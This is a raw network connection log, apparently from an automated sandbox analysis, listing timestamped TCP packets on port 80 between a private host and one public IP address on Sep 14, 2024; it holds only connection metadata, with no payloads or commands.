Sep 14, 2024 12:54:04.358150959 CEST	62827	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:04.365093946 CEST	80	62827	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:04.712531090 CEST	62827	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:04.717880964 CEST	80	62827	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:05.025028944 CEST	80	62827	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:05.087414026 CEST	62827	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:05.156704903 CEST	80	62827	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:05.196894884 CEST	62827	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:05.974245071 CEST	62827	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:05.974513054 CEST	62828	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:05.979451895 CEST	80	62828	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:05.979528904 CEST	62828	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:05.979633093 CEST	62828	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:05.979852915 CEST	80	62827	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:05.979928017 CEST	62827	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:05.984745026 CEST	80	62828	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:06.337461948 CEST	62828	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:06.342530012 CEST	80	62828	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:06.653438091 CEST	80	62828	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:06.712476015 CEST	62828	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:06.788264036 CEST	80	62828	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:06.899940968 CEST	62828	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:06.930434942 CEST	62828	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:06.931323051 CEST	62829	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:06.935756922 CEST	80	62828	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:06.935834885 CEST	62828	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:06.936300039 CEST	80	62829	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:06.936378002 CEST	62829	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:06.936491013 CEST	62829	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:06.941406012 CEST	80	62829	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.119486094 CEST	62829	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:07.120767117 CEST	62830	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:07.126050949 CEST	80	62830	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.126130104 CEST	62830	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:07.126223087 CEST	62830	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:07.131021976 CEST	80	62830	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.165740013 CEST	80	62829	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.242763996 CEST	62831	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:07.247795105 CEST	80	62831	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.247914076 CEST	62831	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:07.247996092 CEST	62831	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:07.252922058 CEST	80	62831	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.418003082 CEST	80	62829	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.418070078 CEST	62829	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:07.478183031 CEST	62830	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:07.483210087 CEST	80	62830	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.483269930 CEST	80	62830	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.603065014 CEST	62831	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:07.608052015 CEST	80	62831	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.810712099 CEST	80	62830	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.853045940 CEST	62830	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:07.944142103 CEST	80	62830	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.945045948 CEST	80	62831	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:07.993767977 CEST	62830	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.103205919 CEST	62831	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.273821115 CEST	80	62831	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:08.273936033 CEST	80	62830	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:08.273988008 CEST	80	62831	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:08.274020910 CEST	62830	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.274033070 CEST	62831	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.397192001 CEST	62830	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.397234917 CEST	62831	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.398248911 CEST	62832	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.402961969 CEST	80	62830	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:08.403032064 CEST	80	62831	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:08.403105974 CEST	62830	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.403119087 CEST	62831	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.403157949 CEST	80	62832	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:08.404416084 CEST	62832	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.404521942 CEST	62832	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.409389019 CEST	80	62832	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:08.759407997 CEST	62832	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:08.764451981 CEST	80	62832	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:09.071523905 CEST	80	62832	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:09.205332041 CEST	80	62832	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:09.205452919 CEST	62832	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:09.319436073 CEST	62832	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:09.320122004 CEST	62833	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:09.324655056 CEST	80	62832	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:09.324734926 CEST	62832	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:09.324881077 CEST	80	62833	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:09.324947119 CEST	62833	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:09.325078964 CEST	62833	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:09.329843998 CEST	80	62833	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:09.681257963 CEST	62833	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:09.915621996 CEST	62833	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:10.228055954 CEST	62833	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:10.706451893 CEST	80	62833	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:10.706636906 CEST	80	62833	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:10.706777096 CEST	62833	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:10.708391905 CEST	80	62833	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:10.708473921 CEST	62833	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:10.708678961 CEST	80	62833	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:10.709325075 CEST	80	62833	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:10.709826946 CEST	80	62833	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:10.988092899 CEST	80	62833	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:11.040582895 CEST	62833	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:11.120465994 CEST	62834	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:11.125574112 CEST	80	62834	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:11.125675917 CEST	62834	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:11.125777006 CEST	62834	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:11.130654097 CEST	80	62834	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:11.478131056 CEST	62834	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:11.483336926 CEST	80	62834	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:11.836971045 CEST	80	62834	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:11.884290934 CEST	62834	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:11.944269896 CEST	80	62834	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:11.993694067 CEST	62834	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.071044922 CEST	62834	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.071470022 CEST	62835	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.076380968 CEST	80	62834	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:12.076406002 CEST	80	62835	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:12.076472998 CEST	62834	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.076530933 CEST	62835	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.076733112 CEST	62835	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.081628084 CEST	80	62835	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:12.431459904 CEST	62835	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.510055065 CEST	80	62835	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:12.740417004 CEST	80	62835	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:12.872405052 CEST	80	62835	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:12.872513056 CEST	62835	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.948019981 CEST	62835	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.948339939 CEST	62836	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.953284979 CEST	80	62835	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:12.953427076 CEST	62835	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.953636885 CEST	80	62836	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:12.953769922 CEST	62836	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.953854084 CEST	62836	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.958626986 CEST	80	62836	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:12.996233940 CEST	62837	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:12.996370077 CEST	62836	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.001544952 CEST	80	62837	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:13.001612902 CEST	62837	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.001713991 CEST	62837	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.006521940 CEST	80	62837	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:13.041604042 CEST	80	62836	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:13.353174925 CEST	62837	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.394996881 CEST	80	62837	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:13.441556931 CEST	80	62836	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:13.441659927 CEST	62836	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.668298960 CEST	80	62837	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:13.712420940 CEST	62837	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.796420097 CEST	80	62837	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:13.915556908 CEST	62837	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.969687939 CEST	62837	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.969799042 CEST	62833	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.970278978 CEST	62838	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.974936962 CEST	80	62837	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:13.974999905 CEST	62837	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.975097895 CEST	80	62838	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:13.975162029 CEST	62838	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.975272894 CEST	62838	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:13.980501890 CEST	80	62838	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:14.321974039 CEST	62838	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:14.326869011 CEST	80	62838	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:14.690608978 CEST	80	62838	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:14.778211117 CEST	80	62838	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:14.778302908 CEST	62838	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:14.898529053 CEST	62838	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:14.899570942 CEST	62839	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:14.903765917 CEST	80	62838	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:14.903842926 CEST	62838	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:14.904429913 CEST	80	62839	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:14.904509068 CEST	62839	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:14.904592037 CEST	62839	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:14.909379005 CEST	80	62839	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:15.259630919 CEST	62839	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:15.264547110 CEST	80	62839	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:15.725864887 CEST	80	62839	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:15.725910902 CEST	80	62839	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:15.725940943 CEST	80	62839	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:15.726016998 CEST	62839	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:15.726577044 CEST	62839	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:15.853991032 CEST	62839	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:15.854623079 CEST	62840	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:15.859401941 CEST	80	62839	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:15.859478951 CEST	80	62840	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:15.859611988 CEST	62839	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:15.859649897 CEST	62840	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:15.859757900 CEST	62840	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:15.864535093 CEST	80	62840	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:16.212682962 CEST	62840	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:16.217797995 CEST	80	62840	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:16.542234898 CEST	80	62840	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:16.603054047 CEST	62840	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:16.672245979 CEST	80	62840	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:16.716420889 CEST	62840	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:16.787821054 CEST	62840	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:16.793113947 CEST	80	62840	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:16.793183088 CEST	62840	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:16.798278093 CEST	62841	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:16.803181887 CEST	80	62841	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:16.803277969 CEST	62841	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:16.803400993 CEST	62841	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:16.808140993 CEST	80	62841	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:17.150063038 CEST	62841	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:17.155112028 CEST	80	62841	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:17.472237110 CEST	80	62841	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:17.524960995 CEST	62841	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:17.800736904 CEST	80	62841	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:17.800916910 CEST	80	62841	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:17.800965071 CEST	62841	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:17.929457903 CEST	62841	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:17.929872990 CEST	62842	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:17.934761047 CEST	80	62842	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:17.934849977 CEST	62842	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:17.934931040 CEST	62842	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:17.934988976 CEST	80	62841	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:17.935038090 CEST	62841	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:17.939651966 CEST	80	62842	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.010696888 CEST	62842	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.011435032 CEST	62843	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.016360998 CEST	80	62843	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.016575098 CEST	62843	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.016719103 CEST	62843	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.021584034 CEST	80	62843	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.061691999 CEST	80	62842	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.131654978 CEST	62844	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.136708021 CEST	80	62844	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.136816025 CEST	62844	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.136878967 CEST	62844	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.141690969 CEST	80	62844	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.368782043 CEST	62843	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.493808031 CEST	62844	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.655368090 CEST	80	62842	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.655498028 CEST	62842	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.655617952 CEST	80	62842	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.655673027 CEST	62842	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.657231092 CEST	80	62843	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.657388926 CEST	80	62843	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.657495975 CEST	80	62844	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.660490990 CEST	80	62842	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.709918976 CEST	80	62843	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.808294058 CEST	80	62844	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:18.853106022 CEST	62844	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.899962902 CEST	62843	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:18.941698074 CEST	80	62843	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:19.007261038 CEST	80	62844	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:19.009319067 CEST	62843	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:19.056210995 CEST	62844	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:19.140805960 CEST	62843	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:19.140849113 CEST	62844	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:19.141405106 CEST	62845	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:19.145919085 CEST	80	62843	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:19.145998001 CEST	62843	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:19.146215916 CEST	80	62845	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:19.146281958 CEST	62845	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:19.146323919 CEST	80	62844	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:19.146368027 CEST	62844	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:19.146568060 CEST	62845	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:19.151364088 CEST	80	62845	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:19.493916988 CEST	62845	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:19.498909950 CEST	80	62845	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:19.813664913 CEST	80	62845	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:19.915585995 CEST	62845	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:20.009752989 CEST	80	62845	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:20.103173018 CEST	62845	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:20.138820887 CEST	62845	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:20.139348030 CEST	62846	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:20.143997908 CEST	80	62845	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:20.144238949 CEST	80	62846	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:20.144252062 CEST	62845	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:20.144315004 CEST	62846	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:20.144419909 CEST	62846	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:20.149137020 CEST	80	62846	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:20.493769884 CEST	62846	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:20.498881102 CEST	80	62846	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:20.905046940 CEST	80	62846	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:20.956338882 CEST	80	62846	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:20.956449032 CEST	62846	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:21.087378025 CEST	62846	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:21.088923931 CEST	62847	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:21.092665911 CEST	80	62846	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:21.092737913 CEST	62846	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:21.093897104 CEST	80	62847	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:21.093961000 CEST	62847	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:21.094047070 CEST	62847	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:21.098936081 CEST	80	62847	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:21.446917057 CEST	62847	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:21.452153921 CEST	80	62847	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:21.779870033 CEST	80	62847	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:21.821899891 CEST	62847	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:21.916532040 CEST	80	62847	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:21.962486029 CEST	62847	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:22.042025089 CEST	62847	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:22.042545080 CEST	62848	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:22.047883987 CEST	80	62847	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:22.047898054 CEST	80	62848	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:22.047959089 CEST	62847	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:22.047993898 CEST	62848	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:22.048103094 CEST	62848	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:22.053174973 CEST	80	62848	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:22.402472019 CEST	62848	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:22.664647102 CEST	80	62848	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:22.719101906 CEST	80	62848	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:22.915575027 CEST	62848	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:22.946315050 CEST	80	62848	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:23.066677094 CEST	62848	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.067029953 CEST	62849	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.073158026 CEST	80	62848	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:23.073213100 CEST	62848	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.073852062 CEST	80	62849	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:23.073915005 CEST	62849	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.074006081 CEST	62849	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.079914093 CEST	80	62849	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:23.431371927 CEST	62849	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.436371088 CEST	80	62849	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:23.827820063 CEST	80	62849	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:23.868761063 CEST	62849	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.869651079 CEST	80	62849	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:23.915585995 CEST	62849	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.947829962 CEST	62849	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.948147058 CEST	62850	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.953048944 CEST	80	62850	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:23.953073978 CEST	80	62849	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:23.953120947 CEST	62850	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.953144073 CEST	62849	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.953223944 CEST	62850	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.958080053 CEST	80	62850	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:23.993501902 CEST	62850	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.994553089 CEST	62851	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.999661922 CEST	80	62851	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:23.999735117 CEST	62851	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:23.999856949 CEST	62851	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:24.004726887 CEST	80	62851	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:24.041594982 CEST	80	62850	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:24.353168964 CEST	62851	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:24.358428955 CEST	80	62851	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:24.433737993 CEST	80	62850	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:24.433814049 CEST	62850	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:24.675563097 CEST	80	62851	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:24.806042910 CEST	80	62851	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:24.806111097 CEST	62851	80	192.168.2.4	80.211.144.156
